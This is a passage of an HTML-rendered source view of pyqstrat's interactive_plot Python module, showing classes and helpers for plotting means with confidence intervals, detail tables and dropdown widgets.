class=\"kc\">None</span><span class=\"p\">:</span> <span class=\"c1\"># type: ignore</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> mean: The function to compute ci for</span>\n<span class=\"sd\"> ci_level: Set to 0 for no confidence intervals, or the level you want.</span>\n<span class=\"sd\"> For example, set to 95 to compute a 95% confidence interval. Default 0</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">mean_func</span> <span class=\"o\">=</span> <span class=\"n\">mean_func</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">ci_level</span> <span class=\"o\">=</span> <span class=\"n\">ci_level</span></div>\n \n<div class=\"viewcode-block\" id=\"MeanWithCI.__call__\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.MeanWithCI.__call__\">[docs]</a> <span class=\"k\">def</span> <span class=\"fm\">__call__</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">filtered_data</span><span class=\"p\">:</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">,</span> <span class=\"n\">xcol</span><span class=\"p\">:</span> <span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">ycol</span><span class=\"p\">:</span> <span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">zcol</span><span class=\"p\">:</span> <span class=\"nb\">str</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"n\">LineDataType</span><span class=\"p\">]:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> For each unique value of x and z, compute mean (and optionally ci) of y.</span>\n<span class=\"sd\"> Return:</span>\n<span class=\"sd\"> x, y data for plotting lines of the mean of y versus x for each z and the data used to compute the mean</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"n\">zvals</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">unique</span><span class=\"p\">(</span><span class=\"n\">filtered_data</span><span class=\"p\">[</span><span class=\"n\">zcol</span><span class=\"p\">])</span>\n <span class=\"n\">cols</span> <span class=\"o\">=</span> <span class=\"p\">[</span><span class=\"n\">col</span> <span class=\"k\">for</span> <span class=\"n\">col</span> <span class=\"ow\">in</span> <span class=\"n\">filtered_data</span><span class=\"o\">.</span><span class=\"n\">columns</span> <span class=\"k\">if</span> <span class=\"n\">col</span> <span class=\"ow\">not</span> <span class=\"ow\">in</span> <span class=\"p\">[</span><span class=\"n\">xcol</span><span class=\"p\">,</span> <span class=\"n\">ycol</span><span class=\"p\">,</span> <span class=\"n\">zcol</span><span class=\"p\">]]</span>\n <span class=\"n\">df</span> <span class=\"o\">=</span> <span class=\"n\">filtered_data</span><span class=\"p\">[[</span><span class=\"n\">xcol</span><span class=\"p\">,</span> <span class=\"n\">ycol</span><span class=\"p\">,</span> <span class=\"n\">zcol</span><span class=\"p\">]</span> <span class=\"o\">+</span> <span class=\"n\">cols</span><span class=\"p\">]</span>\n <span class=\"n\">ret</span> <span class=\"o\">=</span> <span class=\"p\">[]</span>\n <span class=\"n\">columns</span> <span class=\"o\">=</span> <span class=\"p\">[</span><span class=\"n\">xcol</span><span class=\"p\">,</span> <span class=\"n\">ycol</span><span class=\"p\">]</span> <span class=\"k\">if</span> <span class=\"ow\">not</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">ci_level</span> <span class=\"k\">else</span> <span class=\"p\">[</span><span class=\"n\">xcol</span><span class=\"p\">,</span> <span class=\"n\">ycol</span><span class=\"p\">,</span> <span class=\"sa\">f</span><span class=\"s1\">&#39;ci_d_</span><span class=\"si\">{</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">ci_level</span><span class=\"si\">}</span><span class=\"s1\">&#39;</span><span class=\"p\">,</span> <span class=\"sa\">f</span><span class=\"s1\">&#39;ci_u_</span><span class=\"si\">{</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">ci_level</span><span class=\"si\">}</span><span class=\"s1\">&#39;</span><span class=\"p\">]</span>\n <span class=\"k\">for</span> <span class=\"n\">zvalue</span> <span class=\"ow\">in</span> <span class=\"n\">zvals</span><span class=\"p\">:</span>\n <span class=\"n\">df</span> <span class=\"o\">=</span> <span class=\"n\">filtered_data</span><span class=\"p\">[</span><span class=\"n\">filtered_data</span><span class=\"p\">[</span><span class=\"n\">zcol</span><span class=\"p\">]</span> <span class=\"o\">==</span> <span class=\"n\">zvalue</span><span class=\"p\">]</span>\n <span class=\"n\">plt_data</span><span class=\"p\">:</span> <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"n\">Any</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"p\">[]</span>\n <span class=\"k\">for</span> <span class=\"n\">x</span><span class=\"p\">,</span> <span class=\"n\">yseries</span> <span class=\"ow\">in</span> <span class=\"n\">df</span><span class=\"o\">.</span><span class=\"n\">groupby</span><span class=\"p\">(</span><span class=\"n\">xcol</span><span class=\"p\">)[</span><span class=\"n\">ycol</span><span class=\"p\">]:</span>\n <span class=\"n\">y</span> <span class=\"o\">=</span> <span class=\"n\">yseries</span><span class=\"o\">.</span><span class=\"n\">values</span>\n <span class=\"k\">if</span> <span class=\"ow\">not</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">y</span><span class=\"p\">):</span> <span class=\"k\">raise</span> <span class=\"ne\">Exception</span><span class=\"p\">(</span><span class=\"n\">y</span><span class=\"p\">)</span>\n <span class=\"n\">mean</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">mean_func</span><span class=\"p\">(</span><span class=\"n\">y</span><span class=\"p\">)</span>\n <span class=\"k\">if</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">ci_level</span><span class=\"p\">:</span>\n <span class=\"n\">ci_up</span><span class=\"p\">,</span> <span class=\"n\">ci_down</span> <span class=\"o\">=</span> <span class=\"n\">bootstrap_ci</span><span class=\"p\">(</span><span class=\"n\">y</span><span class=\"p\">,</span> <span class=\"n\">ci_level</span><span class=\"o\">=</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">ci_level</span> <span class=\"o\">/</span> <span class=\"mi\">100</span><span class=\"p\">)</span>\n <span class=\"n\">plt_data</span><span class=\"o\">.</span><span class=\"n\">append</span><span class=\"p\">((</span><span class=\"n\">x</span><span class=\"p\">,</span> <span class=\"n\">mean</span><span class=\"p\">,</span> <span class=\"n\">ci_down</span><span class=\"p\">,</span> <span class=\"n\">ci_up</span><span class=\"p\">))</span>\n <span class=\"k\">else</span><span class=\"p\">:</span>\n <span class=\"n\">plt_data</span><span class=\"o\">.</span><span class=\"n\">append</span><span class=\"p\">((</span><span class=\"n\">x</span><span class=\"p\">,</span> <span class=\"n\">mean</span><span class=\"p\">))</span>\n <span class=\"n\">line</span> <span class=\"o\">=</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"o\">.</span><span class=\"n\">from_records</span><span class=\"p\">(</span><span class=\"n\">plt_data</span><span class=\"p\">,</span> <span class=\"n\">columns</span><span class=\"o\">=</span><span class=\"n\">columns</span><span class=\"p\">)</span>\n <span class=\"n\">ret</span><span class=\"o\">.</span><span class=\"n\">append</span><span class=\"p\">((</span><span class=\"n\">zvalue</span><span class=\"p\">,</span> <span class=\"n\">line</span><span class=\"p\">,</span> <span class=\"n\">df</span><span class=\"p\">))</span>\n <span class=\"k\">return</span> <span class=\"n\">ret</span></div></div>\n \n \n<div class=\"viewcode-block\" id=\"SimpleDetailTable\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.SimpleDetailTable\">[docs]</a><span class=\"k\">class</span> <span class=\"nc\">SimpleDetailTable</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Displays a pandas DataFrame under a plot that contains the data used to compute a statistic of y for each x, y pair</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n \n<div class=\"viewcode-block\" id=\"SimpleDetailTable.__init__\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.SimpleDetailTable.__init__\">[docs]</a> <span class=\"k\">def</span> <span class=\"fm\">__init__</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> \n <span class=\"n\">colnames</span><span class=\"p\">:</span> <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">]</span> <span class=\"o\">|</span> <span class=\"kc\">None</span> <span class=\"o\">=</span> <span class=\"kc\">None</span><span class=\"p\">,</span> \n <span class=\"n\">float_format</span><span class=\"p\">:</span> <span class=\"nb\">str</span> <span class=\"o\">=</span> <span class=\"s1\">&#39;</span><span class=\"si\">{:.4g}</span><span class=\"s1\">&#39;</span><span class=\"p\">,</span> \n <span class=\"n\">min_rows</span><span class=\"p\">:</span> <span class=\"nb\">int</span> <span class=\"o\">=</span> <span class=\"mi\">100</span><span class=\"p\">,</span> \n <span class=\"n\">copy_to_clipboard</span><span class=\"p\">:</span> <span class=\"nb\">bool</span> <span class=\"o\">=</span> <span class=\"kc\">True</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> colnames: list of column names to display. If None we display all columns. Default None</span>\n<span class=\"sd\"> float_format: Format for each floating point column. Default {:.4g}</span>\n<span class=\"sd\"> min_rows: Do not truncate the display of the table before this many rows. Default 100</span>\n<span class=\"sd\"> copy_to_clipboard: If set, we copy the dataframe to the clipboard. On linux, you must install xclip for this to work</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">colnames</span> <span class=\"o\">=</span> <span class=\"n\">colnames</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">float_format</span> <span class=\"o\">=</span> <span class=\"n\">float_format</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">min_rows</span> <span class=\"o\">=</span> <span class=\"n\">min_rows</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">copy_to_clipboard</span> <span class=\"o\">=</span> <span class=\"kc\">True</span></div>\n \n<div class=\"viewcode-block\" id=\"SimpleDetailTable.__call__\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.SimpleDetailTable.__call__\">[docs]</a> <span class=\"k\">def</span> <span class=\"fm\">__call__</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">detail_widget</span><span class=\"p\">:</span> <span class=\"n\">widgets</span><span class=\"o\">.</span><span class=\"n\">Widget</span><span class=\"p\">,</span> <span class=\"n\">data</span><span class=\"p\">:</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">,</span> <span class=\"n\">debug</span><span class=\"o\">=</span><span class=\"kc\">False</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> detail_widget: The widget to display the data in</span>\n<span class=\"sd\"> data: The dataframe to display</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"k\">if</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">float_format</span><span class=\"p\">:</span>\n <span class=\"n\">orig_float_format</span> <span class=\"o\">=</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">options</span><span class=\"o\">.</span><span class=\"n\">display</span><span class=\"o\">.</span><span class=\"n\">float_format</span>\n <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">options</span><span class=\"o\">.</span><span class=\"n\">display</span><span class=\"o\">.</span><span class=\"n\">float_format</span> <span class=\"o\">=</span> <span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">float_format</span><span class=\"p\">)</span><span class=\"o\">.</span><span class=\"n\">format</span>\n \n <span class=\"k\">if</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">min_rows</span><span class=\"p\">:</span>\n <span class=\"n\">orig_min_rows</span> <span class=\"o\">=</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">options</span><span class=\"o\">.</span><span class=\"n\">display</span><span class=\"o\">.</span><span class=\"n\">min_rows</span>\n <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">options</span><span class=\"o\">.</span><span class=\"n\">display</span><span class=\"o\">.</span><span class=\"n\">min_rows</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">min_rows</span>\n \n <span class=\"k\">with</span> <span class=\"n\">detail_widget</span><span class=\"p\">:</span>\n <span class=\"k\">if</span> <span class=\"ow\">not</span> <span class=\"n\">debug</span><span class=\"p\">:</span> <span class=\"n\">clear_output</span><span class=\"p\">()</span>\n <span class=\"k\">if</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">colnames</span><span class=\"p\">:</span> <span class=\"n\">data</span> <span class=\"o\">=</span> <span class=\"n\">data</span><span class=\"p\">[</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">colnames</span><span class=\"p\">]</span>\n <span class=\"n\">data</span> <span class=\"o\">=</span> <span class=\"n\">data</span><span class=\"o\">.</span><span class=\"n\">reset_index</span><span class=\"p\">(</span><span class=\"n\">drop</span><span class=\"o\">=</span><span class=\"kc\">True</span><span class=\"p\">)</span>\n <span class=\"n\">display</span><span class=\"p\">(</span><span class=\"n\">data</span><span class=\"p\">)</span>\n <span class=\"k\">if</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">copy_to_clipboard</span><span class=\"p\">:</span> <span class=\"n\">data</span><span class=\"o\">.</span><span class=\"n\">to_clipboard</span><span class=\"p\">(</span><span class=\"n\">index</span><span class=\"o\">=</span><span class=\"kc\">False</span><span class=\"p\">)</span>\n \n <span class=\"k\">if</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">float_format</span><span class=\"p\">:</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">options</span><span class=\"o\">.</span><span class=\"n\">display</span><span class=\"o\">.</span><span class=\"n\">float_format</span> <span class=\"o\">=</span> <span class=\"n\">orig_float_format</span>\n <span class=\"k\">if</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">min_rows</span><span class=\"p\">:</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">options</span><span class=\"o\">.</span><span class=\"n\">display</span><span class=\"o\">.</span><span class=\"n\">min_rows</span> <span class=\"o\">=</span> <span class=\"n\">orig_min_rows</span></div></div>\n \n \n<div class=\"viewcode-block\" id=\"create_selection_dropdowns\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.create_selection_dropdowns\">[docs]</a><span class=\"k\">def</span> <span class=\"nf\">create_selection_dropdowns</span><span class=\"p\">(</span><span class=\"n\">dims</span><span class=\"p\">:</span> <span class=\"nb\">dict</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"nb\">str</span><span class=\"p\">],</span> <span class=\"n\">labels</span><span class=\"p\">:</span> <span class=\"nb\">dict</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"nb\">str</span><span class=\"p\">],</span> <span class=\"n\">update_form_func</span><span class=\"p\">:</span> <span class=\"n\">UpdateFormFuncType</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"nb\">dict</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">Any</span><span class=\"p\">]:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Create a list of selection widgets</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"n\">selection_widgets</span><span class=\"p\">:</span> <span class=\"nb\">dict</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">widgets</span><span class=\"o\">.</span><span class=\"n\">Widget</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"p\">{}</span>\n <span class=\"k\">for</span> <span class=\"n\">name</span> <span class=\"ow\">in</span> <span class=\"n\">dims</span><span class=\"o\">.</span><span class=\"n\">keys</span><span class=\"p\">():</span>\n <span class=\"n\">label</span> <span class=\"o\">=</span> <span class=\"n\">labels</span><span class=\"p\">[</span><span class=\"n\">name</span><span class=\"p\">]</span> <span class=\"k\">if</span> <span class=\"n\">name</span> <span class=\"ow\">in</span> <span class=\"n\">labels</span> <span class=\"k\">else</span> <span class=\"n\">name</span>\n <span class=\"n\">widget</span> <span class=\"o\">=</span> <span class=\"n\">widgets</span><span class=\"o\">.</span><span class=\"n\">Dropdown</span><span class=\"p\">(</span><span class=\"n\">description</span><span class=\"o\">=</span><span class=\"n\">label</span><span class=\"p\">,</span> <span class=\"n\">style</span><span class=\"o\">=</span><span class=\"p\">{</span><span class=\"s1\">&#39;description_width&#39;</span><span class=\"p\">:</span> <span class=\"s1\">&#39;initial&#39;</span><span class=\"p\">})</span>\n <span class=\"n\">selection_widgets</span><span class=\"p\">[</span><span class=\"n\">name</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"n\">widget</span>\n \n <span class=\"k\">for</span> <span class=\"n\">widget</span> <span class=\"ow\">in</span> <span class=\"n\">selection_widgets</span><span class=\"o\">.</span><span class=\"n\">values</span><span class=\"p\">():</span>\n <span class=\"n\">widget</span><span class=\"o\">.</span><span class=\"n\">observe</span><span class=\"p\">(</span><span class=\"k\">lambda</span> <span class=\"n\">x</span><span class=\"p\">:</span> <span class=\"n\">on_widgets_updated</span><span class=\"p\">(</span><span class=\"n\">x</span><span class=\"p\">,</span> <span class=\"n\">update_form_func</span><span class=\"p\">,</span> <span class=\"n\">selection_widgets</span><span class=\"p\">),</span> <span class=\"n\">names</span><span class=\"o\">=</span><span class=\"s1\">&#39;value&#39;</span><span class=\"p\">)</span>\n\n <span class=\"k\">return</span> <span class=\"n\">selection_widgets</span></div>\n\n\n<div class=\"viewcode-block\" id=\"on_widgets_updated\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.on_widgets_updated\">[docs]</a><span class=\"k\">def</span> <span class=\"nf\">on_widgets_updated</span><span class=\"p\">(</span><span class=\"n\">change</span><span class=\"p\">:</span> <span class=\"n\">traitlets</span><span class=\"o\">.</span><span class=\"n\">utils</span><span class=\"o\">.</span><span class=\"n\">bunch</span><span class=\"o\">.</span><span class=\"n\">Bunch</span><span class=\"p\">,</span> <span class=\"n\">update_form_func</span><span class=\"p\">,</span> <span class=\"n\">selection_widgets</span><span class=\"p\">:</span> <span class=\"nb\">dict</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">widgets</span><span class=\"o\">.</span><span class=\"n\">Widget</span><span class=\"p\">])</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Callback called by plotly when widgets are updated by the user.</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"n\">owner</span> <span class=\"o\">=</span> <span class=\"n\">change</span><span class=\"p\">[</span><span class=\"s1\">&#39;owner&#39;</span><span class=\"p\">]</span>\n <span class=\"n\">widgets</span> <span class=\"o\">=</span> <span class=\"nb\">list</span><span class=\"p\">(</span><span class=\"n\">selection_widgets</span><span class=\"o\">.</span><span class=\"n\">values</span><span class=\"p\">())</span>\n <span class=\"n\">owner_idx</span> <span class=\"o\">=</span> <span class=\"n\">widgets</span><span class=\"o\">.</span><span class=\"n\">index</span><span class=\"p\">(</span><span class=\"n\">owner</span><span class=\"p\">)</span>\n <span class=\"n\">update_form_func</span><span class=\"p\">(</span><span class=\"n\">owner_idx</span><span class=\"p\">)</span></div>\n \n \n<div class=\"viewcode-block\" id=\"LineConfig\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.LineConfig\">[docs]</a><span class=\"nd\">@dataclass</span>\n<span class=\"k\">class</span> <span class=\"nc\">LineConfig</span><span class=\"p\">:</span>\n <span class=\"n\">color</span><span class=\"p\">:</span> <span class=\"nb\">str</span> <span class=\"o\">|</span> <span class=\"kc\">None</span> <span class=\"o\">=</span> <span class=\"kc\">None</span>\n <span class=\"n\">thickness</span><span class=\"p\">:</span> <span class=\"nb\">float</span> <span class=\"o\">=</span> <span class=\"n\">math</span><span class=\"o\">.</span><span class=\"n\">nan</span>\n <span class=\"n\">secondary_y</span><span class=\"p\">:</span> <span class=\"nb\">bool</span> <span class=\"o\">=</span> <span class=\"kc\">False</span>\n <span class=\"n\">marker_mode</span><span class=\"p\">:</span> <span class=\"nb\">str</span> <span class=\"o\">=</span> <span class=\"s1\">&#39;lines+markers&#39;</span>\n <span class=\"n\">show_detail</span><span class=\"p\">:</span> <span class=\"nb\">bool</span> <span class=\"o\">=</span> <span class=\"kc\">True</span></div>\n \n \n<span class=\"k\">def</span> <span class=\"nf\">_plotly_color_to_rgb</span><span class=\"p\">(</span><span class=\"n\">plotly_color</span><span class=\"p\">:</span> <span class=\"nb\">str</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"nb\">tuple</span><span class=\"p\">[</span><span class=\"nb\">int</span><span class=\"p\">,</span> <span class=\"nb\">int</span><span class=\"p\">,</span> <span class=\"nb\">int</span><span class=\"p\">]:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Convert plotly color which is a string into r, g, b values</span>\n<span class=\"sd\"> &gt;&gt;&gt; assert _plotly_color_to_rgb(&#39;rgb(31, 119, 180)&#39;) == (31, 119, 180)</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"n\">plotly_color</span> <span class=\"o\">=</span> <span class=\"n\">plotly_color</span><span class=\"o\">.</span><span class=\"n\">replace</span><span class=\"p\">(</span><span class=\"s1\">&#39;rgb(&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;&#39;</span><span class=\"p\">)</span><span class=\"o\">.</span><span class=\"n\">replace</span><span class=\"p\">(</span><span class=\"s1\">&#39;)&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;&#39;</span><span class=\"p\">)</span>\n <span class=\"n\">s</span> <span class=\"o\">=</span> <span class=\"n\">plotly_color</span><span class=\"o\">.</span><span class=\"n\">split</span><span class=\"p\">(</span><span class=\"s1\">&#39;,&#39;</span><span class=\"p\">)</span>\n <span class=\"n\">r</span><span class=\"p\">,</span> <span class=\"n\">g</span><span class=\"p\">,</span> <span class=\"n\">b</span> <span class=\"o\">=</span> <span class=\"nb\">int</span><span class=\"p\">(</span><span class=\"n\">s</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">]),</span> <span class=\"nb\">int</span><span class=\"p\">(</span><span class=\"n\">s</span><span class=\"p\">[</span><span class=\"mi\">1</span><span class=\"p\">]),</span> <span class=\"nb\">int</span><span class=\"p\">(</span><span class=\"n\">s</span><span class=\"p\">[</span><span class=\"mi\">2</span><span class=\"p\">])</span>\n <span class=\"k\">return</span> <span class=\"n\">r</span><span class=\"p\">,</span> <span class=\"n\">g</span><span class=\"p\">,</span> <span class=\"n\">b</span>\n\n \n<span class=\"k\">def</span> <span class=\"nf\">_lighten_color</span><span class=\"p\">(</span><span class=\"n\">r</span><span class=\"p\">:</span> <span class=\"nb\">int</span><span class=\"p\">,</span> <span class=\"n\">g</span><span class=\"p\">:</span> <span class=\"nb\">int</span><span class=\"p\">,</span> <span class=\"n\">b</span><span class=\"p\">:</span> <span class=\"nb\">int</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"nb\">tuple</span><span class=\"p\">[</span><span class=\"nb\">int</span><span class=\"p\">,</span> <span class=\"nb\">int</span><span class=\"p\">,</span> <span class=\"nb\">int</span><span class=\"p\">]:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Lighten color so we can show confidence intervals in a lighter shade than the line itself</span>\n<span class=\"sd\"> We convert to hls and increase lightness and decrease saturation</span>\n<span class=\"sd\"> &gt;&gt;&gt; assert _lighten_color(31, 119, 180) == (102, 168, 214)</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"n\">hls</span> <span class=\"o\">=</span> <span class=\"n\">colorsys</span><span class=\"o\">.</span><span class=\"n\">rgb_to_hls</span><span class=\"p\">(</span><span class=\"n\">r</span><span class=\"p\">,</span> <span class=\"n\">g</span><span class=\"p\">,</span> <span class=\"n\">b</span><span class=\"p\">)</span>\n <span class=\"n\">light_hls</span> <span class=\"o\">=</span> <span class=\"p\">(</span><span class=\"n\">hls</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">],</span> <span class=\"n\">hls</span><span class=\"p\">[</span><span class=\"mi\">1</span><span class=\"p\">]</span> <span class=\"o\">*</span> <span class=\"mf\">1.5</span><span class=\"p\">,</span> <span class=\"n\">hls</span><span class=\"p\">[</span><span class=\"mi\">2</span><span class=\"p\">]</span> <span class=\"o\">*</span> <span class=\"mf\">0.5</span><span class=\"p\">)</span>\n <span class=\"n\">rgb</span> <span class=\"o\">=</span> <span class=\"n\">colorsys</span><span class=\"o\">.</span><span class=\"n\">hls_to_rgb</span><span class=\"p\">(</span><span class=\"o\">*</span><span class=\"n\">light_hls</span><span class=\"p\">)</span>\n <span class=\"n\">rgb</span> <span class=\"o\">=</span> <span class=\"p\">(</span><span class=\"nb\">int</span><span class=\"p\">(</span><span class=\"nb\">round</span><span class=\"p\">(</span><span class=\"n\">rgb</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">])),</span> <span class=\"nb\">int</span><span class=\"p\">(</span><span class=\"nb\">round</span><span class=\"p\">(</span><span class=\"n\">rgb</span><span class=\"p\">[</span><span class=\"mi\">1</span><span class=\"p\">])),</span> <span class=\"nb\">int</span><span class=\"p\">(</span><span class=\"nb\">round</span><span class=\"p\">(</span><span class=\"n\">rgb</span><span class=\"p\">[</span><span class=\"mi\">2</span><span class=\"p\">])))</span>\n <span class=\"k\">return</span> <span class=\"n\">rgb</span>\n\n\n<div class=\"viewcode-block\" id=\"foo\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.foo\">[docs]</a><span class=\"k\">def</span> <span class=\"nf\">foo</span><span class=\"p\">(</span><span class=\"n\">name</span><span class=\"p\">,</span> <span class=\"n\">old</span><span class=\"p\">,</span> <span class=\"n\">new</span><span class=\"p\">):</span>\n <span class=\"kn\">import</span> <span class=\"nn\">datetime</span>\n <span class=\"nb\">print</span><span class=\"p\">(</span><span class=\"sa\">f</span><span class=\"s1\">&#39;hello: </span><span class=\"si\">{</span><span class=\"n\">datetime</span><span class=\"o\">.</span><span class=\"n\">datetime</span><span class=\"o\">.</span><span class=\"n\">now</span><span class=\"p\">()</span><span class=\"si\">}</span><span class=\"s1\"> </span><span class=\"si\">{</span><span class=\"n\">name</span><span class=\"si\">}</span><span class=\"s1\"> </span><span class=\"si\">{</span><span class=\"n\">old</span><span class=\"si\">}</span><span class=\"s1\"> </span><span class=\"si\">{</span><span class=\"n\">new</span><span class=\"si\">}</span><span class=\"s1\">&#39;</span><span class=\"p\">)</span></div>\n \n \n<div class=\"viewcode-block\" id=\"LineGraphWithDetailDisplay\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.LineGraphWithDetailDisplay\">[docs]</a><span class=\"k\">class</span> <span class=\"nc\">LineGraphWithDetailDisplay</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Draws line graphs and also includes a detail pane.</span>\n<span class=\"sd\"> When you click on a point on the line graph, the detail pane shows the data used to compute that point.</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n \n<div class=\"viewcode-block\" id=\"LineGraphWithDetailDisplay.__init__\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.LineGraphWithDetailDisplay.__init__\">[docs]</a> <span class=\"k\">def</span> <span class=\"fm\">__init__</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> \n <span class=\"n\">display_detail_func</span><span class=\"p\">:</span> <span class=\"n\">DetailDisplayType</span> <span class=\"o\">=</span> <span class=\"n\">SimpleDetailTable</span><span class=\"p\">(),</span> \n <span class=\"n\">line_configs</span><span class=\"p\">:</span> <span class=\"nb\">dict</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">LineConfig</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"p\">{},</span> \n <span class=\"n\">title</span><span class=\"p\">:</span> <span class=\"nb\">str</span> <span class=\"o\">|</span> <span class=\"kc\">None</span> <span class=\"o\">=</span> <span class=\"kc\">None</span><span class=\"p\">,</span> \n <span class=\"n\">hovertemplate</span><span class=\"p\">:</span> <span class=\"nb\">str</span> <span class=\"o\">|</span> <span class=\"kc\">None</span> <span class=\"o\">=</span> <span class=\"kc\">None</span><span class=\"p\">,</span> \n <span class=\"n\">debug</span><span 